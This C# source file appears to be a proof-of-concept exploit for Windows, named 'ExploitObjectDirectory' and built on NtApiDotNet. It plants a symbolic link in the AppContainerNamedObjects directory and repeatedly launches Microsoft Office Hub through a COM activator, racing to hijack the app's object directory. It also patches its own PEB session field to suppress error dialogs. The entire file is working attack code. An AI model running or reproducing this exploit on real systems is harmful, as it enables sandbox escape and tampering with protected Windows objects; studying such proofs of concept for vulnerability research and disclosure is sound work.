﻿using NtApiDotNet;
using NtApiDotNet.Win32;
using System;
using System.Runtime.InteropServices;
using System.Threading;

namespace ExploitObjectDirectory
{
    enum ActivationOptions
    {
        RunAs = 1,
    }

    [Guid("72e3a5b0-8fea-485c-9f8b-822b16dba17f")]
    [InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    interface IDesktopAppXActivator
    {
        void Activate(string applicationUserModelId, string packageRelativeExecutable, string arguments, out IntPtr processHandle);
        void ActivateWithOptions(string applicationUserModelId, string executable, string arguments, ActivationOptions options, int parentProcessId, out IntPtr processHandle);
    }

    [Guid("168EB462-775F-42AE-9111-D714B2306C2E")]
    [ComImport]
    class DesktopAppxActivator
    {
    }

    class Program
    {
        const int PebSessionId32 = 0x1d4;
        const int PebsessionId64 = 0x2c0;

        const string PackageId = "Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe";
        const string TargetDir = @"\Blah";

        static void RunOfficeHub()
        {
            try
            {
                IDesktopAppXActivator activator = (IDesktopAppXActivator)new DesktopAppxActivator();
                activator.Activate($"{PackageId}!Microsoft.MicrosoftOfficeHub", @"Office16\OfficeHubWin32.exe", "ABC", out IntPtr process_handle);
            }
            catch
            {
            }
        }

        static string GetPackageSid()
        {
            return TokenUtils.DerivePackageSidFromName(PackageId).ToString();
        }

        static NtDirectory OpenAppContainerDirectory()
        {
            return NtDirectory.OpenSessionDirectory("AppContainerNamedObjects");
        }

        static bool CheckObjectDirectory()
        {
            using (var ac_dir = OpenAppContainerDirectory())
            {
                using (var obj_attr = new ObjectAttributes(GetPackageSid(), AttributeFlags.CaseInsensitive, ac_dir))
                {
                    using (var result = NtDirectory.Open(obj_attr, DirectoryAccessRights.MaximumAllowed, false))
                    {
                        return result.IsSuccess;
                    }
                }
            }
        }

        static NtDirectory _captured_dir = null;

        static void RunThread(object obj)
        {
            AutoResetEvent ev = (AutoResetEvent)obj;
            using (var dir = OpenAppContainerDirectory())
            {
                using (NtSymbolicLink link = NtSymbolicLink.Create(GetPackageSid(), dir, TargetDir))
                {
                    Console.WriteLine("Starting polling thread");
                    ev.Set();
                    using (var obj_attr = new ObjectAttributes(TargetDir, AttributeFlags.CaseInsensitive))
                    {
                        while (true)
                        {
                            var result = NtDirectory.Open(obj_attr, DirectoryAccessRights.MaximumAllowed, false);
                            if (result.IsSuccess)
                            {
                                Console.WriteLine("Opened directory object");
                                _captured_dir = result.Result;
                                break;
                            }
                        }
                    }
                }
            }
        }

        // Set the PEB's SessionId field to 0. On 1709 this seems to disable UI output from ShellExecute when
        // the application fails to start. On 1703 it doesn't seem to work.
        static void DisableUI()
        {
            var p = NtProcess.Current;
            long peb_addr = p.PebAddress.ToInt64() + (p.Is64Bit ? PebsessionId64 : PebSessionId32);

            p.WriteMemory(peb_addr, 0);
        }

        static void Main(string[] args)
        {
            try
            {
                DisableUI();
                if (CheckObjectDirectory())
                {
                    throw new ArgumentException("Close My Office application to continue");
                }

                AutoResetEvent ev = new AutoResetEvent(false);
                Thread t = new Thread(RunThread);
                t.IsBackground = true;
                t.Start(ev);

                ev.WaitOne();

                while (true)
                {
                    RunOfficeHub();
                    if (_captured_dir != null)
                    {
                        break;
                    }
                    Console.WriteLine("Didn't capture target directory, trying again after 1 second.");
                    Thread.Sleep(1000);
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex.Message);
            }
            Console.WriteLine("Captured directory {0}", _captured_dir.FullPath);
            Console.WriteLine("Granted Access {0}", _captured_dir.GrantedAccess);
            Console.ReadLine();
        }
    }
}
